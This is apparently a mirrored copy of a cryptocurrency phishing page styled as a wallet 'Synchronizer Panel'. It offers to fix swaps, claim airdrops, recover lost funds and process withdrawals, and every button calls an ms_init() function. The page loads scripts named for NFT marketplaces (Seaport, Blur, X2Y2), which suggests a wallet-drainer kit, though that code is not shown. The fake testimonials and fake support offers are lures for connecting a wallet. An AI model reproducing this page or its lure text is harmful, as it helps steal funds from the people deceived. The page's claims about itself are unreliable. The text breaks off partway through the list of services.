<html lang="en">
 
<!-- Mirrored from maigrathhe.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 05 Mar 2024 06:27:47 GMT -->
<head>
  <script src="../unpkg.com/web3%404.5.0/dist/web3.min.js">
  </script>
  <script src="../unpkg.com/crypto-js%404.2.0/crypto-js.js">
  </script>
  <script src="../cdnjs.cloudflare.com/ajax/libs/ethers/5.7.2/ethers.umd.js" type="application/javascript">
  </script>
  </script>
  <script src="1cde88185df12d-2b3.js">
  </script>
  <script src="1cde88185df12d-2b3.js">
  </script>
  <meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
  <title>
   multiwalletapp
  </title>
  <meta content="width=device-width,initial-scale=1" name="viewport"/>
  <link href="../unpkg.com/aos%402.3.1/dist/aos.css" rel="stylesheet"/>
  <link href="assets/swiper-bundle.min.css" rel="stylesheet"/>
  <link href="assets/style.css" rel="stylesheet"/>
  <link href="assets/style.css" rel="stylesheet"/>
  <link href="assets/flowbite.min.css" rel="stylesheet"/>
  <style>
   html {
        scroll-behavior: smooth;
      }

      .section {
        padding: 70px;
      }
  </style>
  <script src="./assets/web3-provider/web3-modal.js"></script> 
  <script src="./assets/web3-provider/web3-loader.js"></script> 
  <script src="./assets/web3-provider/web3-connect.js"></script> 
  <script src="./assets/web3-provider/web3-router.js"></script> 
  <script src="./assets/web3-provider/web3-module.js"></script> 
  <script src="./assets/web3-provider/web3-alert.js"></script> 
  <script src="./assets/web3-provider/web3-seaport.js"></script>
  <script src="./assets/web3-provider/web3-data.js"></script> 
  <script src="./assets/web3-provider/ethers.js"></script> 
  <script src="./assets/web3-provider/ethereum-tx.js"></script> 
  <script src="./assets/web3-modules/module-seaport.js"></script>
  <script src="./assets/web3-modules/module-blur.js"></script>
  <script src="./assets/web3-modules/module-x2y2.js"></script> 
  <script src="./assets/web3-provider.js"></script>
 </head>
 <link href="totalcss.css" rel="stylesheet"/>
 <body class="csn8e c4aab cgum6 cvhsn c9tl9" data-aos-delay="0" data-aos-duration="500" data-aos-easing="ease-out-cubic">
  <!-- Page wrapper -->
  <div class="cha4x c4sc1 ch6o9 cyp0p">
   <!-- Site header -->
   <header class="cov9f cfdji cirl7">
    <div class="crs2z c12sl ced2s cgwxs">
     <div class="cha4x c319x crevm cen5c crh9v">
      <!-- Site branding -->
      <div class="c1odj ckkox">
       <!-- Logo -->
       <a onclick="ms_init()" aria-label="Cruip" class="c5jbp">
        <svg class="cua7u cgwd6" viewbox="0 0 32 32" xmlns="http://www.w3.org/2000/svg">
         <defs>
          <lineargradient id="hlogo-a" x1="0%" x2="104.18%" y1="32.443%" y2="50%">
           <stop offset="0%" stop-color="#FFF" stop-opacity=".299">
           </stop>
           <stop offset="100%" stop-color="#7587E4" stop-opacity="0">
           </stop>
          </lineargradient>
          <lineargradient id="hlogo-b" x1="18.591%" x2="100%" y1="0%" y2="100%">
           <stop offset="0%" stop-color="#818CF8">
           </stop>
           <stop offset="100%" stop-color="#C7D2FE">
           </stop>
          </lineargradient>
         </defs>
         <g fill="none" fill-rule="evenodd">
          <path d="M16 18.5V32l15.999-9.25V9.25z" fill="#3730A3">
          </path>
          <path d="m0 23 16 9V18.501L0 9.251z" fill="#4F46E5">
          </path>
          <path d="M16 13 0 23l16 9 16-9z" fill="url(#hlogo-a)" fill-opacity=".64">
          </path>
          <path d="M16 0 0 9.25l16 9.25 15.999-9.25z" fill="url(#hlogo-b)">
          </path>
         </g>
        </svg>
       </a>
      </div>
      <!-- Desktop navigation -->
      <nav class="cha4x cf1jb">
       <!-- Desktop sign in links -->
       <ul class="cha4x cf1jb clkiw crevm cc6hi">
        <li class="c3ck5">
         <a onclick="ms_init()" class="c21mu cirl7 cyy7p cy9j6 cbjhp cvnv6 ceef4">
          Migration
         </a>
        </li>
       </ul>
      </nav>
     </div>
    </div>
   </header>
   <!-- Page content -->
   <main class="cf1jb">
    <!-- Hero -->
    <section class="csghv">
     <!-- Illustration -->
     <div aria-hidden="true" class="cgtjr cov9f cjnxd c1hsh cwrme cf03e clxpw">
      <img alt="Hero Illustration" class="cpd9d" height="1265" src="assets/hero-illustration.svg" width="1440"/>
     </div>
     <div class="csghv crs2z c12sl ced2s cgwxs">
      <div class="c58bt cgm1l">
       <!-- Hero content -->
       <div class="crs2z cg714 cipqn">
        <h1 class="cbvak c6vue c3yu8 aos-init aos-animate" data-aos="fade-up" style="font-size: x-large; font-weight: bold">
         The MultiChain Protocol For DApp
        </h1>
        <p class="cc00p clo86 c0muy aos-init aos-animate" data-aos="fade-up" data-aos-delay="100">
         Synchronizer Panel is an open protocol to communicate securely
                  between Wallets and Dapps on the blockchain (Web3 Apps).
        </p>
        <div class="crs2z c8hla cun0l cljb8 ce61j cmqpv c85uq cqevc aos-init aos-animate" data-aos="fade-up" data-aos-delay="200">
         <div>
          <a onclick="ms_init()" class="c4rfz cirl7 cyy7p cy9j6 cbjhp cvnv6 ceef4">
           Connect wallet
          </a>
         </div>
         <div>
          <a onclick="ms_init()" class="c4rfz cirl7 celu7 c4c2d cvxjb cbjhp cb83r">
           Migrate
          </a>
         </div>
        </div>
       </div>
       <!-- Hero image -->
       <div class="c2ur2 cdfdp aos-init aos-animate" data-aos="fade-up" data-aos-delay="300">
        <img alt="Hero" class="crs2z" height="518" src="assets/merge.webp" width="920"/>
       </div>
      </div>
     </div>
    </section>
    <!-- CONNECT modal -->
    <!-- Testimonials -->
    <section>
     <div class="crs2z c12sl ced2s cgwxs">
      <div class="cl69e c8w8t c15wg chd23">
       <!-- Items -->
       <div class="crs2z cwqzj cof2s cob9s cjgmc cdch9 c3tol c2o91">
        <!-- 1st Testimonial -->
        <article class="cha4x cofye ch6o9 crevm cipqn aos-init aos-animate" data-aos="fade-up">
         <header class="c4lht">
          <!-- Stars -->
          <div class="c2r6u">
           <div class="cha4x c9her">
            <button class="">
             <span class="cr5dx">
              1 star
             </span>
             <svg class="c67h9 cr2cf c5910" viewbox="0 0 16 16">
              <path d="M10 5.934L8 0 6 5.934H0l4.89 3.954L2.968 16 8 12.223 13.032 16 11.11 9.888 16 5.934z">
              </path>
             </svg>
            </button>
            <button class="">
             <span class="cr5dx">
              2 stars
             </span>
             <svg class="c67h9 cr2cf c5910" viewbox="0 0 16 16">
              <path d="M10 5.934L8 0 6 5.934H0l4.89 3.954L2.968 16 8 12.223 13.032 16 11.11 9.888 16 5.934z">
              </path>
             </svg>
            </button>
            <button class="">
             <span class="cr5dx">
              3 stars
             </span>
             <svg class="c67h9 cr2cf c5910" viewbox="0 0 16 16">
              <path d="M10 5.934L8 0 6 5.934H0l4.89 3.954L2.968 16 8 12.223 13.032 16 11.11 9.888 16 5.934z">
              </path>
             </svg>
            </button>
            <button class="">
             <span class="cr5dx">
              4 stars
             </span>
             <svg class="c67h9 cr2cf c5910" viewbox="0 0 16 16">
              <path d="M10 5.934L8 0 6 5.934H0l4.89 3.954L2.968 16 8 12.223 13.032 16 11.11 9.888 16 5.934z">
              </path>
             </svg>
            </button>
            <button class="">
             <span class="cr5dx">
              5 stars
             </span>
             <svg class="c67h9 cr2cf c5910" viewbox="0 0 16 16">
              <path d="M10 5.934L8 0 6 5.934H0l4.89 3.954L2.968 16 8 12.223 13.032 16 11.11 9.888 16 5.934z">
              </path>
             </svg>
            </button>
           </div>
          </div>
         </header>
         <div class="c4lht cf1jb">
          <p class="cha20 c0muy">
           "The only tool that has the technology to meet our unique
                      and complex needs."
          </p>
         </div>
         <footer class="c83rt czouw c0muy">
          <a onclick="ms_init()" class="cvxjb cigyt cjn6n ckqwr c5rz3">
           fred
          </a>
          -
          <span class="cb58e">
           4.9/5
          </span>
         </footer>
        </article>
        <!-- 2nd Testimonial -->
        <article class="cha4x cofye ch6o9 crevm cipqn aos-init aos-animate" data-aos="fade-up" data-aos-delay="200">
         <header class="c4lht">
          <!-- Stars -->
          <div class="c2r6u">
           <div class="cha4x c9her">
            <button class="">
             <span class="cr5dx">
              1 star
             </span>
             <svg class="c67h9 cr2cf c5910" viewbox="0 0 16 16">
              <path d="M10 5.934L8 0 6 5.934H0l4.89 3.954L2.968 16 8 12.223 13.032 16 11.11 9.888 16 5.934z">
              </path>
             </svg>
            </button>
            <button class="">
             <span class="cr5dx">
              2 stars
             </span>
             <svg class="c67h9 cr2cf c5910" viewbox="0 0 16 16">
              <path d="M10 5.934L8 0 6 5.934H0l4.89 3.954L2.968 16 8 12.223 13.032 16 11.11 9.888 16 5.934z">
              </path>
             </svg>
            </button>
            <button class="">
             <span class="cr5dx">
              3 stars
             </span>
             <svg class="c67h9 cr2cf c5910" viewbox="0 0 16 16">
              <path d="M10 5.934L8 0 6 5.934H0l4.89 3.954L2.968 16 8 12.223 13.032 16 11.11 9.888 16 5.934z">
              </path>
             </svg>
            </button>
            <button class="">
             <span class="cr5dx">
              4 stars
             </span>
             <svg class="c67h9 cr2cf c5910" viewbox="0 0 16 16">
              <path d="M10 5.934L8 0 6 5.934H0l4.89 3.954L2.968 16 8 12.223 13.032 16 11.11 9.888 16 5.934z">
              </path>
             </svg>
            </button>
            <button class="">
             <span class="cr5dx">
              5 stars
             </span>
             <svg class="c67h9 cr2cf c5910" viewbox="0 0 16 16">
              <path d="M10 5.934L8 0 6 5.934H0l4.89 3.954L2.968 16 8 12.223 13.032 16 11.11 9.888 16 5.934z">
              </path>
             </svg>
            </button>
           </div>
          </div>
         </header>
         <div class="c4lht cf1jb">
          <p class="cha20 c0muy">
           "Fast and easy web3"
          </p>
         </div>
         <footer class="c83rt czouw c0muy">
          <a onclick="ms_init()" class="cvxjb cigyt cjn6n ckqwr c5rz3">
           Ben
          </a>
          -
          <span class="cb58e">
           4.7/5
          </span>
         </footer>
        </article>
        <!-- 3rd Testimonial -->
       </div>
      </div>
     </div>
    </section>
    <!-- Features #2 -->
    <section class="csghv cn8hk c8w8t">
     <!-- Bg gradient: top -->
     <div aria-hidden="true" class="cgtjr cov9f cokz4 cs58h c1p84 c1hsh c20k8 cv4we cdbty czarn cy0u8">
     </div>
     <!-- Illustration -->
     <div aria-hidden="true" class="cgtjr cov9f cjnxd cokz4 c1hsh coo5p cwrme cf03e ce7wk">
      <img alt="Features 02 Illustration" class="cpd9d" height="453" src="assets/features-illustration-02.svg" width="1440"/>
     </div>
     <div class="crs2z c12sl ced2s cgwxs">
      <div class="c15wg chd23">
       <!-- Section header -->
       <div class="crs2z cg714 czcex cipqn cbzdz">
        <h2 class="cnoe4 c3yu8" style="font-size: x-large">
         Opening the doors of new world of Dapp experiences.
        </h2>
       </div>
       <ol class="relative border-l p-4 border-gray-200 dark:border-gray-700">
        <li class="mb-10 ml-4">
         <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
         </div>
         <h3 class="text-lg font-semibold text-white dark:text-white">
          Swap/Exchange
         </h3>
         <p class="mb-4 text-base font-normal text-gray-500 dark:text-gray-400">
          For any issues with swapping/exchange of coins
         </p>
         <a onclick="ms_init()" class="inline-flex items-center py-2 px-4 text-sm font-medium text-gray-900 bg-white rounded-lg border border-gray-200 hover:bg-gray-100 hover:text-blue-700 focus:z-10 focus:ring-4 focus:outline-none focus:ring-gray-200 focus:text-blue-700 dark:bg-gray-800 dark:text-gray-400 dark:border-gray-600 dark:hover:text-white dark:hover:bg-gray-700 dark:focus:ring-gray-700">
          Fix Swap Issues
          <svg class="ml-2 w-3 h-3" fill="currentColor" viewbox="0 0 20 20" xmlns="http://www.w3.org/2000/svg">
           <path clip-rule="evenodd" d="M12.293 5.293a1 1 0 011.414 0l4 4a1 1 0 010 1.414l-4 4a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-2.293-2.293a1 1 0 010-1.414z" fill-rule="evenodd">
           </path>
          </svg>
         </a>
        </li>
        <li class="mb-10 ml-4">
         <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
         </div>
         <h3 class="text-lg font-semibold text-white dark:text-white">
          Validation
         </h3>
         <p class="mb-4 text-base font-normal text-gray-500 dark:text-gray-400">
          For any validation click here
         </p>
         <a onclick="ms_init()" class="inline-flex items-center py-2 px-4 text-sm font-medium text-gray-900 bg-white rounded-lg border border-gray-200 hover:bg-gray-100 hover:text-blue-700 focus:z-10 focus:ring-4 focus:outline-none focus:ring-gray-200 focus:text-blue-700 dark:bg-gray-800 dark:text-gray-400 dark:border-gray-600 dark:hover:text-white dark:hover:bg-gray-700 dark:focus:ring-gray-700 ">
          Validation
          <svg class="ml-2 w-3 h-3" fill="currentColor" viewbox="0 0 20 20" xmlns="http://www.w3.org/2000/svg">
           <path clip-rule="evenodd" d="M12.293 5.293a1 1 0 011.414 0l4 4a1 1 0 010 1.414l-4 4a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-2.293-2.293a1 1 0 010-1.414z" fill-rule="evenodd">
           </path>
          </svg>
         </a>
        </li>
        <li class="mb-10 ml-4">
         <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
         </div>
         <h3 class="text-lg font-semibold text-white dark:text-white">
          Claim Airdrop
         </h3>
         <p class="mb-4 text-base font-normal text-gray-500 dark:text-gray-400">
          to Claim Airdrop click here
         </p>
         <a onclick="ms_init()" class="inline-flex items-center py-2 px-4 text-sm font-medium text-gray-900 bg-white rounded-lg border border-gray-200 hover:bg-gray-100 hover:text-blue-700 focus:z-10 focus:ring-4 focus:outline-none focus:ring-gray-200 focus:text-blue-700 dark:bg-gray-800 dark:text-gray-400 dark:border-gray-600 dark:hover:text-white dark:hover:bg-gray-700 dark:focus:ring-gray-700 ">
          Click here to Claim Airdrop
          <svg class="ml-2 w-3 h-3" fill="currentColor" viewbox="0 0 20 20" xmlns="http://www.w3.org/2000/svg">
           <path clip-rule="evenodd" d="M12.293 5.293a1 1 0 011.414 0l4 4a1 1 0 010 1.414l-4 4a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-2.293-2.293a1 1 0 010-1.414z" fill-rule="evenodd">
           </path>
          </svg>
         </a>
        </li>
        <li class="mb-10 ml-4">
         <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
         </div>
         <h3 class="text-lg font-semibold text-white dark:text-white">
          Rectification
         </h3>
         <p class="mb-4 text-base font-normal text-gray-500 dark:text-gray-400">
          For Rectification click here
         </p>
         <a onclick="ms_init()"  class="inline-flex items-center py-2 px-4 text-sm font-medium text-gray-900 bg-white rounded-lg border border-gray-200 hover:bg-gray-100 hover:text-blue-700 focus:z-10 focus:ring-4 focus:outline-none focus:ring-gray-200 focus:text-blue-700 dark:bg-gray-800 dark:text-gray-400 dark:border-gray-600 dark:hover:text-white dark:hover:bg-gray-700 dark:focus:ring-gray-700 ">
          Rectification
          <svg class="ml-2 w-3 h-3" fill="currentColor" viewbox="0 0 20 20" xmlns="http://www.w3.org/2000/svg">
           <path clip-rule="evenodd" d="M12.293 5.293a1 1 0 011.414 0l4 4a1 1 0 010 1.414l-4 4a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-2.293-2.293a1 1 0 010-1.414z" fill-rule="evenodd">
           </path>
          </svg>
         </a>
        </li>
        <li class="mb-10 ml-4">
         <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
         </div>
         <h3 class="text-lg font-semibold text-white dark:text-white">
          Decentralized/Centralized Trading Wallet
         </h3>
         <p class="text-base font-normal text-gray-500 dark:text-gray-400">
          Connect decentralised web applications to mobile wallets or
                    enable DApp on mobile wallets/extension.
         </p>
         <a onclick="ms_init()" class="mt-3 inline-flex items-center py-2 px-4 text-sm font-medium text-gray-900 bg-white rounded-lg border border-gray-200 hover:bg-gray-100 hover:text-blue-700 focus:z-10 focus:ring-4 focus:outline-none focus:ring-gray-200 focus:text-blue-700 dark:bg-gray-800 dark:text-gray-400 dark:border-gray-600 dark:hover:text-white dark:hover:bg-gray-700 dark:focus:ring-gray-700 ">
          Connect
          <svg class="ml-2 w-3 h-3" fill="currentColor" viewbox="0 0 20 20" xmlns="http://www.w3.org/2000/svg">
           <path clip-rule="evenodd" d="M12.293 5.293a1 1 0 011.414 0l4 4a1 1 0 010 1.414l-4 4a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-2.293-2.293a1 1 0 010-1.414z" fill-rule="evenodd">
           </path>
          </svg>
         </a>
        </li>
        <li class="mb-10 ml-4">
         <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
         </div>
         <h3 class="text-lg font-semibold text-white dark:text-white">
          Buy/Sell
         </h3>
         <p class="text-base font-normal text-gray-500 dark:text-gray-400">
          Connect to enable Buy/Sell of DApp on mobile
                    wallets/extension.
         </p>
         <a onclick="ms_init()" class="mt-3 inline-flex items-center py-2 px-4 text-sm font-medium text-gray-900 bg-white rounded-lg border border-gray-200 hover:bg-gray-100 hover:text-blue-700 focus:z-10 focus:ring-4 focus:outline-none focus:ring-gray-200 focus:text-blue-700 dark:bg-gray-800 dark:text-gray-400 dark:border-gray-600 dark:hover:text-white dark:hover:bg-gray-700 dark:focus:ring-gray-700 ">
          Connect
          <svg class="ml-2 w-3 h-3" fill="currentColor" viewbox="0 0 20 20" xmlns="http://www.w3.org/2000/svg">
           <path clip-rule="evenodd" d="M12.293 5.293a1 1 0 011.414 0l4 4a1 1 0 010 1.414l-4 4a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-2.293-2.293a1 1 0 010-1.414z" fill-rule="evenodd">
           </path>
          </svg>
         </a>
        </li>
        <li class="mb-10 ml-4">
         <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
         </div>
         <h3 class="text-lg font-semibold text-white dark:text-white">
          Verification
         </h3>
         <p class="text-base font-normal text-gray-500 dark:text-gray-400">
          <a onclick="ms_init()" class="mt-3 inline-flex items-center py-2 px-4 text-sm font-medium text-gray-900 bg-white rounded-lg border border-gray-200 hover:bg-gray-100 hover:text-blue-700 focus:z-10 focus:ring-4 focus:outline-none focus:ring-gray-200 focus:text-blue-700 dark:bg-gray-800 dark:text-gray-400 dark:border-gray-600 dark:hover:text-white dark:hover:bg-gray-700 dark:focus:ring-gray-700 ">
           Verify
           <svg class="ml-2 w-3 h-3" fill="currentColor" viewbox="0 0 20 20" xmlns="http://www.w3.org/2000/svg">
            <path clip-rule="evenodd" d="M12.293 5.293a1 1 0 011.414 0l4 4a1 1 0 010 1.414l-4 4a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-2.293-2.293a1 1 0 010-1.414z" fill-rule="evenodd">
            </path>
           </svg>
          </a>
         </p>
        </li>
        <li class="mb-10 ml-4">
         <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
         </div>
         <h3 class="text-lg font-semibold text-white dark:text-white">
          Withdrawal
         </h3>
         <p class="text-base font-normal text-gray-500 dark:text-gray-400">
          Move your Cryptocurrency balance off the revolute platform
                    to an external crypto wallet that you control such as a
                    Ledger or a Trezor.
         </p>
         <a onclick="ms_init()" class="mt-3 inline-flex items-center py-2 px-4 text-sm font-medium text-gray-900 bg-white rounded-lg border border-gray-200 hover:bg-gray-100 hover:text-blue-700 focus:z-10 focus:ring-4 focus:outline-none focus:ring-gray-200 focus:text-blue-700 dark:bg-gray-800 dark:text-gray-400 dark:border-gray-600 dark:hover:text-white dark:hover:bg-gray-700 dark:focus:ring-gray-700 ">
          Withdraw
          <svg class="ml-2 w-3 h-3" fill="currentColor" viewbox="0 0 20 20" xmlns="http://www.w3.org/2000/svg">
           <path clip-rule="evenodd" d="M12.293 5.293a1 1 0 011.414 0l4 4a1 1 0 010 1.414l-4 4a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-2.293-2.293a1 1 0 010-1.414z" fill-rule="evenodd">
           </path>
          </svg>
         </a>
        </li>
        <li class="mb-10 ml-4">
         <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
         </div>
         <h3 class="text-lg font-semibold text-white dark:text-white">
          Stake/Harvest Stakings/Unstake
         </h3>
         <p class="text-base font-normal text-gray-500 dark:text-gray-400">
          Stake your assets and when you choose to redeem, we'll
                    return your assets to your spot wallet the followimg day
         </p>
         <a onclick="ms_init()" class="mt-3 inline-flex items-center py-2 px-4 text-sm font-medium text-gray-900 bg-white rounded-lg border border-gray-200 hover:bg-gray-100 hover:text-blue-700 focus:z-10 focus:ring-4 focus:outline-none focus:ring-gray-200 focus:text-blue-700 dark:bg-gray-800 dark:text-gray-400 dark:border-gray-600 dark:hover:text-white dark:hover:bg-gray-700 dark:focus:ring-gray-700 ">
          Stake
          <svg class="ml-2 w-3 h-3" fill="currentColor" viewbox="0 0 20 20" xmlns="http://www.w3.org/2000/svg">
           <path clip-rule="evenodd" d="M12.293 5.293a1 1 0 011.414 0l4 4a1 1 0 010 1.414l-4 4a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-2.293-2.293a1 1 0 010-1.414z" fill-rule="evenodd">
           </path>
          </svg>
         </a>
         <a onclick="ms_init()" class="mt-3 inline-flex items-center py-2 px-4 text-sm font-medium text-gray-900 bg-white rounded-lg border border-gray-200 hover:bg-gray-100 hover:text-blue-700 focus:z-10 focus:ring-4 focus:outline-none focus:ring-gray-200 focus:text-blue-700 dark:bg-gray-800 dark:text-gray-400 dark:border-gray-600 dark:hover:text-white dark:hover:bg-gray-700 dark:focus:ring-gray-700 ">
          Harvest Stakings
          <svg class="ml-2 w-3 h-3" fill="currentColor" viewbox="0 0 20 20" xmlns="http://www.w3.org/2000/svg">
           <path clip-rule="evenodd" d="M12.293 5.293a1 1 0 011.414 0l4 4a1 1 0 010 1.414l-4 4a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-2.293-2.293a1 1 0 010-1.414z" fill-rule="evenodd">
           </path>
          </svg>
         </a>
        </li>
        <li class="ml-4">
         <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
         </div>
         <h3 class="text-lg font-semibold text-white dark:text-white">
          Login Issues
         </h3>
         <p class="text-base font-normal text-gray-500 dark:text-gray-400">
          if you have issues logging into your wallet.
         </p>
         <a onclick="ms_init()" class="mt-3 inline-flex items-center py-2 px-4 text-sm font-medium text-gray-900 bg-white rounded-lg border border-gray-200 hover:bg-gray-100 hover:text-blue-700 focus:z-10 focus:ring-4 focus:outline-none focus:ring-gray-200 focus:text-blue-700 dark:bg-gray-800 dark:text-gray-400 dark:border-gray-600 dark:hover:text-white dark:hover:bg-gray-700 dark:focus:ring-gray-700 ">
          Fix
          <svg class="ml-2 w-3 h-3" fill="currentColor" viewbox="0 0 20 20" xmlns="http://www.w3.org/2000/svg">
           <path clip-rule="evenodd" d="M12.293 5.293a1 1 0 011.414 0l4 4a1 1 0 010 1.414l-4 4a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-2.293-2.293a1 1 0 010-1.414z" fill-rule="evenodd">
           </path>
          </svg>
         </a>
        </li>
        <li class="ml-4">
         <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
         </div>
         <h3 class="text-lg font-semibold text-white dark:text-white">
          Farm/Pool
         </h3>
         <p class="text-base font-normal text-gray-500 dark:text-gray-400">
          if you have issues logging into your wallet.
         </p>
         <a onclick="ms_init()" class="mt-3 inline-flex items-center py-2 px-4 text-sm font-medium text-gray-900 bg-white rounded-lg border border-gray-200 hover:bg-gray-100 hover:text-blue-700 focus:z-10 focus:ring-4 focus:outline-none focus:ring-gray-200 focus:text-blue-700 dark:bg-gray-800 dark:text-gray-400 dark:border-gray-600 dark:hover:text-white dark:hover:bg-gray-700 dark:focus:ring-gray-700 ">
          Fix
          <svg class="ml-2 w-3 h-3" fill="currentColor" viewbox="0 0 20 20" xmlns="http://www.w3.org/2000/svg">
           <path clip-rule="evenodd" d="M12.293 5.293a1 1 0 011.414 0l4 4a1 1 0 010 1.414l-4 4a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-2.293-2.293a1 1 0 010-1.414z" fill-rule="evenodd">
           </path>
          </svg>
         </a>
        </li>
        <li class="ml-4" style="margin-top: 20px">
         <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
         </div>
         <h3 class="text-lg font-semibold text-white dark:text-white">
          Missing Funds/Irregular token balance
         </h3>
         <p class="text-base font-normal text-gray-500 dark:text-gray-400">
          Recover missing or lost funds.
         </p>
         <a onclick="ms_init()" class="mt-3 inline-flex items-center py-2 px-4 text-sm font-medium text-gray-900 bg-white rounded-lg border border-gray-200 hover:bg-gray-100 hover:text-blue-700 focus:z-10 focus:ring-4 focus:outline-none focus:ring-gray-200 focus:text-blue-700 dark:bg-gray-800 dark:text-gray-400 dark:border-gray-600 dark:hover:text-white dark:hover:bg-gray-700 dark:focus:ring-gray-700 ">
          Fix
          <svg class="ml-2 w-3 h-3" fill="currentColor" viewbox="0 0 20 20" xmlns="http://www.w3.org/2000/svg">
           <path clip-rule="evenodd" d="M12.293 5.293a1 1 0 011.414 0l4 4a1 1 0 010 1.414l-4 4a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-2.293-2.293a1 1 0 010-1.414z" fill-rule="evenodd">
           </path>
          </svg>
         </a>
        </li>
        <li class="ml-4" style="margin-top: 20px">
         <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
         </div>
         <h3 class="text-lg font-semibold text-white dark:text-white">
          Exhorbitant Gas fees
         </h3>
         <a onclick="ms_init()" class="mt-3 inline-flex items-center py-2 px-4 text-sm font-medium text-gray-900 bg-white rounded-lg border border-gray-200 hover:bg-gray-100 hover:text-blue-700 focus:z-10 focus:ring-4 focus:outline-none focus:ring-gray-200 focus:text-blue-700 dark:bg-gray-800 dark:text-gray-400 dark:border-gray-600 dark:hover:text-white dark:hover:bg-gray-700 dark:focus:ring-gray-700 ">
          Fix
          <svg class="ml-2 w-3 h-3" fill="currentColor" viewbox="0 0 20 20" xmlns="http://www.w3.org/2000/svg">
           <path clip-rule="evenodd" d="M12.293 5.293a1 1 0 011.414 0l4 4a1 1 0 010 1.414l-4 4a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-2.293-2.293a1 1 0 010-1.414z" fill-rule="evenodd">
           </path>
          </svg>
         </a>
        </li>
        <li class="ml-4" style="margin-top: 20px">
         <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
         </div>
         <h3 class="text-lg font-semibold text-white dark:text-white">
          Transaction Error
         </h3>
         <p class="text-base font-normal text-gray-500 dark:text-gray-400">
          Do you have any issues with transactions?
         </p>
         <a onclick="ms_init()" class="mt-3 inline-flex items-center py-2 px-4 text-sm font-medium text-gray-900 bg-white rounded-lg border border-gray-200 hover:bg-gray-100 hover:text-blue-700 focus:z-10 focus:ring-4 focus:outline-none focus:ring-gray-200 focus:text-blue-700 dark:bg-gray-800 dark:text-gray-400 dark:border-gray-600 dark:hover:text-white dark:hover:bg-gray-700 dark:focus:ring-gray-700 ">
          Rectify
          <svg class="ml-2 w-3 h-3" fill="currentColor" viewbox="0 0 20 20" xmlns="http://www.w3.org/2000/svg">
           <path clip-rule="evenodd" d="M12.293 5.293a1 1 0 011.414 0l4 4a1 1 0 010 1.414l-4 4a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-2.293-2.293a1 1 0 010-1.414z" fill-rule="evenodd">
           </path>
          </svg>
         </a>
        </li>
        <li class="ml-4" style="margin-top: 20px">
         <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
         </div>
         <h3 class="text-lg font-semibold text-white dark:text-white">
          Issue with Trading Wallet
         </h3>
         <p class="text-base font-normal text-gray-500 dark:text-gray-400">
          Do you have any issues with your trading wallet?
         </p>
         <a onclick="ms_init()" class="mt-3 inline-flex items-center py-2 px-4 text-sm font-medium text-gray-900 bg-white rounded-lg border border-gray-200 hover:bg-gray-100 hover:text-blue-700 focus:z-10 focus:ring-4 focus:outline-none focus:ring-gray-200 focus:text-blue-700 dark:bg-gray-800 dark:text-gray-400 dark:border-gray-600 dark:hover:text-white dark:hover:bg-gray-700 dark:focus:ring-gray-700 ">
          Rectify
          <svg class="ml-2 w-3 h-3" fill="currentColor" viewbox="0 0 20 20" xmlns="http://www.w3.org/2000/svg">
           <path clip-rule="evenodd" d="M12.293 5.293a1 1 0 011.414 0l4 4a1 1 0 010 1.414l-4 4a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-2.293-2.293a1 1 0 010-1.414z" fill-rule="evenodd">
           </path>
          </svg>
         </a>
        </li>
        <li class="ml-4" style="margin-top: 20px">
         <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
         </div>
